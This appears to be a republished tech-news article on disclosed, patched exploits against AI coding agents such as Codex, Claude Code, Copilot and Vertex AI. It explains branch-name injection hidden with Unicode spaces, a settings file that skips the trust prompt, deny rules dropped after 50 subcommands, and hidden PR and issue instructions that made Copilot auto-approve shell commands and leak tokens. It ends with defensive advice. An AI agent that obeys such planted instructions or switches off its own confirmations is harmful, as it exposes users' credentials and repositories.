Thursday, 30 Apr 2026
  • Contact
  • Privacy Policy
  • Terms & Conditions
  • DMCA
logo logo
  • World
  • Politics
  • Crime
  • Economy
  • Tech & Science
  • Sports
  • Entertainment
  • More
    • Education
    • Celebrities
    • Culture and Arts
    • Environment
    • Health and Wellness
    • Lifestyle
  • 🔥
  • Trump
  • House
  • ScienceAlert
  • White
  • VIDEO
  • man
  • Trumps
  • Season
  • star
  • Years
Font ResizerAa
American FocusAmerican Focus
Search
  • World
  • Politics
  • Crime
  • Economy
  • Tech & Science
  • Sports
  • Entertainment
  • More
    • Education
    • Celebrities
    • Culture and Arts
    • Environment
    • Health and Wellness
    • Lifestyle
Follow US
© 2024 americanfocus.online – All Rights Reserved.
American Focus > Blog > Tech and Science > Claude Code, Copilot and Codex all got hacked. Every attacker went for the credential, not the model.
Tech and Science

Claude Code, Copilot and Codex all got hacked. Every attacker went for the credential, not the model.

Last updated: April 30, 2026 12:30 pm
Share
Claude Code, Copilot and Codex all got hacked. Every attacker went for the credential, not the model.
SHARE

Contents
Codex: Stealing GitHub Tokens via Branch NameClaude Code: Bypassing Security with Two CVEs and a 50-Subcommand ExploitCopilot: Pull Request Descriptions and GitHub Issues Trigger Root AccessVertex AI: Default Scopes Access Gmail, Drive, and Google’s Supply ChainVentureBeat Defense GridEvery Exploit Targeted Runtime Credentials, Not Model OutputSecurity Director Action PlanThe Governance Gap in Three Sentences

On March 30, BeyondTrust revealed a vulnerability where a crafted GitHub branch name could expose Codex’s OAuth token in cleartext. OpenAI rated this issue as Critical P1. Two days later, Anthropic’s Claude Code source code was inadvertently published on the public npm registry. Shortly thereafter, Adversa discovered that Claude Code was bypassing its own deny rules when a command exceeded 50 subcommands. These incidents were part of a broader trend lasting nine months, during which six research teams identified exploits affecting Codex, Claude Code, Copilot, and Vertex AI. These exploits consistently involved AI coding agents using credentials to perform actions and authenticate to systems without a human session anchoring the request.

The vulnerability landscape was first highlighted at Black Hat USA 2025, when Zenity CTO Michael Bargury hijacked ChatGPT, Microsoft Copilot Studio, Google Gemini, Salesforce Einstein, and Cursor using Jira MCP in a live demonstration with zero user interaction. Nine months later, these credentials were targeted by attackers.

Merritt Baer, CSO at Enkrypt AI and previously Deputy CISO at AWS, described this issue in an exclusive VentureBeat interview: “Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system.” She emphasized that the underlying credentials are the true risk.

Codex: Stealing GitHub Tokens via Branch Name

BeyondTrust researchers Tyler Jespersen, Fletcher Davis, and Simon Stewart identified that Codex cloned repositories using a GitHub OAuth token embedded within the git remote URL. During the cloning process, the branch name parameter was unsanitized, allowing a semicolon and backtick subshell to transform the branch name into an exfiltration payload.

Stewart implemented additional stealth by appending 94 Ideographic Space characters (Unicode U+3000) after “main,” making the malicious branch appear identical to the standard main branch in the Codex web portal. While developers saw “main,” the shell executed a command to export their token. OpenAI rated this as Critical P1 and completed full remediation by February 5, 2026.

Claude Code: Bypassing Security with Two CVEs and a 50-Subcommand Exploit

CVE-2026-25723 affected Claude Code’s file-write restrictions, allowing piped sed and echo commands to escape the project sandbox due to unvalidated command chaining. It was patched in version 2.0.55. CVE-2026-33068 was more subtle; it involved resolving permission modes from .claude/settings.json before displaying the workspace trust dialog. A malicious repository could set permissions.defaultMode to bypassPermissions, preventing the trust prompt from appearing. This was fixed in version 2.1.53.

See also  How Anthropic's Claude cuts SOC investigation time from 5 hours to 7 minutes

The 50-subcommand bypass was the final vulnerability identified. Adversa discovered that Claude Code stopped enforcing deny rules once a command exceeded 50 subcommands. In a trade-off for speed, Anthropic’s engineers had halted security checks after the fiftieth subcommand. This was addressed in version 2.1.90.

Carter Rees, VP of AI and Machine Learning at Reputation and a Utah AI Commission member, remarked on a significant issue in enterprise AI: broken access control where the flat authorization plane of an LLM does not respect user permissions. The repository dictated agent permissions, while the token budget determined which deny rules were enforced.

Copilot: Pull Request Descriptions and GitHub Issues Trigger Root Access

Johann Rehberger demonstrated CVE-2025-53773 against GitHub Copilot with Markus Vervier of Persistent Security as a co-discoverer. Hidden instructions in pull request (PR) descriptions caused Copilot to enable auto-approve mode in .vscode/settings.json. This disabled all confirmations, allowing unrestricted shell execution on Windows, macOS, and Linux. Microsoft patched this in the August 2025 Patch Tuesday release.

Orca Security later exploited Copilot within GitHub Codespaces. Hidden instructions in a GitHub issue led Copilot to check out a malicious PR with a symbolic link to /workspaces/.codespaces/shared/user-secrets-envs.json. A crafted JSON $schema URL then exfiltrated the privileged GITHUB_TOKEN, allowing a complete repository takeover with no user interaction beyond opening the issue.

Mike Riemer, CTO at Ivanti, explained the speed factor in a VentureBeat interview: “Threat actors are reverse engineering patches within 72 hours. If a customer doesn’t patch within that window, they’re vulnerable to exploitation.” Agents reduce this time frame to mere seconds.

Vertex AI: Default Scopes Access Gmail, Drive, and Google’s Supply Chain

Unit 42 researcher Ofir Shaty discovered that the default Google service identity for every Vertex AI agent had excessive permissions. Stolen P4SA credentials allowed unrestricted read access to all Cloud Storage buckets in the project and access to restricted, Google-owned Artifact Registry repositories crucial to the Vertex AI Reasoning Engine. Shaty described the compromised P4SA as acting like a “double agent,” accessing both user data and Google’s infrastructure.

VentureBeat Defense Grid

Security requirement

Defense shipped

Exploit path

The gap

Sandbox AI agent execution

Codex runs tasks in cloud containers; token scrubbed during agent runtime.

Token present during cloning. Branch-name command injection executed before cleanup.

No input sanitization on container setup parameters.

Restrict file system access

Claude Code sandboxes writes via accept-edits mode.

Piped sed/echo escaped sandbox (CVE-2026-25723). Settings.json bypassed trust dialog (CVE-2026-33068). 50-subcommand chain dropped deny-rule enforcement.

Command chaining not validated. Settings loaded before trust. Deny rules truncated for performance.

Block prompt injection in code context

Copilot filters PR descriptions for known injection patterns.

Hidden injections in PRs, README files, and GitHub issues triggered RCE (CVE-2025-53773 + Orca RoguePilot).

Static pattern matching loses to embedded prompts in legitimate review and Codespaces flows.

Scope agent credentials to least privilege

Vertex AI Agent Engine uses P4SA service agent with OAuth scopes.

Default scopes reached Gmail, Calendar, Drive. P4SA credentials read every Cloud Storage bucket and Google’s Artifact Registry.

OAuth scopes non-editable by default. Least privilege violated by design.

Inventory and govern agent identities

No major AI coding agent vendor ships agent identity discovery or lifecycle management.

Not attempted. Enterprises do not inventory AI coding agents, their credentials, or their permission scopes.

AI coding agents are invisible to IAM, CMDB, and asset inventory. Zero governance exists.

Detect credential exfiltration from agent runtime

Codex obscures tokens in web portal view. Claude Code logs subcommands.

Tokens visible in cleartext inside containers. Unicode obfuscation hid exfil payloads. Subcommand chaining hid intent.

No runtime monitoring of agent network calls. Log truncation hid the bypass.

Audit AI-generated code for security flaws

Anthropic launched Claude Code Security (Feb 2026). OpenAI launched Codex Security (March 2026).

Both scan generated code. Neither scans the agent’s own execution environment or credential handling.

Code-output security is not agent-runtime security. The agent itself is the attack surface.

See also  This Memory Technique Primes The Brain to Absorb More Information : ScienceAlert

Every Exploit Targeted Runtime Credentials, Not Model Output

Despite each vendor deploying defenses, every defense was ultimately bypassed.

The Sonar 2026 State of Code Developer Survey found that 25% of developers regularly use AI agents, with 64% having adopted them at some point. Veracode evaluated over 100 LLMs and discovered that 45% of generated code samples contained OWASP Top 10 flaws, further exacerbating the runtime credential vulnerability.

CrowdStrike CTO Elia Zaitsev stressed in a VentureBeat interview at RSAC 2026 the importance of aligning agent identities with human identities: an agent acting on behalf of a user should not have more privileges than the user. Codex possessed a GitHub OAuth token scoped to every repository authorized by the developer. Vertex AI’s P4SA had access to every Cloud Storage bucket within the project. Claude Code prioritized token budget over deny-rule enforcement.

Kayne McGladrey, an IEEE Senior Member advising on identity risk, echoed a similar sentiment in a VentureBeat interview: “It uses far more permissions than it should have, more than a human would, due to the speed of scale and intent.”

Riemer, in another VentureBeat interview, emphasized the importance of validation: “It becomes, I don’t know you until I validate you.” Here, the branch name communicated with the shell prior to validation, just as the GitHub issue communicated with Copilot before being reviewed.

Security Director Action Plan

  1. Inventory every AI coding agent (CIEM). Codex, Claude Code, Copilot, Cursor, Gemini Code Assist, Windsurf. Catalog the credentials and OAuth scopes each received during setup. If absent, create a CMDB category for AI agent identities.

  2. Audit OAuth scopes and patch levels. Upgrade Claude Code to version 2.1.90 or later. Confirm Copilot’s August 2025 patch. Transition Vertex AI to a bring-your-own-service-account model.

  3. Treat branch names, pull request descriptions, GitHub issues, and repository configuration as untrusted input. Monitor for Unicode obfuscation (U+3000), command chaining over 50 subcommands, and alterations to .vscode/settings.json or .claude/settings.json that change permission modes.

  4. Govern agent identities as you would human privileged identities (PAM/IGA). Implement credential rotation, least-privilege scoping, and separation of duties between coding and deployment agents. CyberArk, Delinea, and any PAM platform accepting non-human identities can onboard agent OAuth credentials today; Gravitee’s 2026 survey indicated only 21.9% of teams have done this.

  5. Validate before you communicate. “As long as we trust and we check and we validate, I’m fine with letting AI maintain it,” Riemer stated. Before any AI coding agent authenticates to GitHub, Gmail, or an internal repository, verify the agent’s identity, scope, and the human session it is linked to.

  6. Ask each vendor in writing before your next renewal. “Show me the identity lifecycle management controls for the AI agent running in my environment, including credential scope, rotation policy, and permission audit trail.” If the vendor cannot provide an answer, that constitutes an audit finding.

See also  Apple Just Released a New AI Model. Should You Buy AAPL Stock Here?

The Governance Gap in Three Sentences

Most CISOs track every human identity but lack inventory of AI agents operating with equivalent credentials. IAM frameworks do not govern human and agent privilege escalation with consistent rigor. Most scanners detect every CVE but fail to alert when a branch name exfiltrates a GitHub token through a trusted container.

Zaitsev advised RSAC 2026 attendees with clarity: the necessary actions are known. Agents have only increased the cost of inaction to a catastrophic level.

TAGGED:AttackerClaudeCodeCodexCopilotcredentialHackedModel
Share This Article
Twitter Email Copy Link Print
Previous Article An AI model beat ER doctors at diagnosing patients, in a new study : NPR An AI model beat ER doctors at diagnosing patients, in a new study : NPR
Next Article Trump withdraws Casey Means nomination for surgeon general Trump withdraws Casey Means nomination for surgeon general

Popular Posts

London’s Largest Ancient Roman Fresco Makes for the ‘World’s Most Difficult Jigsaw Puzzle’ — Colossal

London, a city with a rich history dating back nearly 2,000 years, never fails to…

June 23, 2025

FOIA Documents Reveal South Carolina Attorney General Reportedly FAILED to Prosecute Child Predators in Dorchester County — Nearly Every Case Dismissed or Dropped | The Gateway Pundit | by Jim Hᴏft

Recent disclosures under the Freedom of Information Act have revealed a troubling trend that raises…

October 7, 2025

Kamala Harris Admits This Split-Second Blunder ‘Pulled The Pin’ On Her Campaign

After the dust settled, Kamala Harris was in disbelief. “I could barely breathe,” she writes…

September 20, 2025

Maniac busted for slugging pregnant woman, 37, on NYC subway — fourth random attack on female straphangers in as many months: sources

Recent incidents in the New York City subway system have highlighted the issue of repeat…

March 7, 2025

“Do not do this” – Serena Williams’ husband Alexis Ohanian gets backlash from fans after using AI to recreate memory with late mother

Serena Williams' husband Alexis Ohanian recently made headlines by using AI technology to bring a…

June 22, 2025

You Might Also Like

An AI model beat ER doctors at diagnosing patients, in a new study : NPR
World News

An AI model beat ER doctors at diagnosing patients, in a new study : NPR

April 30, 2026
Pioneering geneticist and decoder of the human genome J. Craig Venter dies at 79
Tech and Science

Pioneering geneticist and decoder of the human genome J. Craig Venter dies at 79

April 30, 2026
Tech Advisor June 2026 digital magazine: Best budget tablets, Google Gemini tips, Android Desktop’s pros and cons, and much more
Tech and Science

Tech Advisor June 2026 digital magazine: Best budget tablets, Google Gemini tips, Android Desktop’s pros and cons, and much more

April 30, 2026
Simple treatment tweak drastically reduces blood loss from severe cuts
Tech and Science

Simple treatment tweak drastically reduces blood loss from severe cuts

April 29, 2026
logo logo
Facebook Twitter Youtube

About US


Explore global affairs, political insights, and linguistic origins. Stay informed with our comprehensive coverage of world news, politics, and Lifestyle.

Top Categories
  • Crime
  • Environment
  • Sports
  • Tech and Science
Usefull Links
  • Contact
  • Privacy Policy
  • Terms & Conditions
  • DMCA

© 2024 americanfocus.online –  All Rights Reserved.

Welcome Back!

Sign in to your account

Lost your password?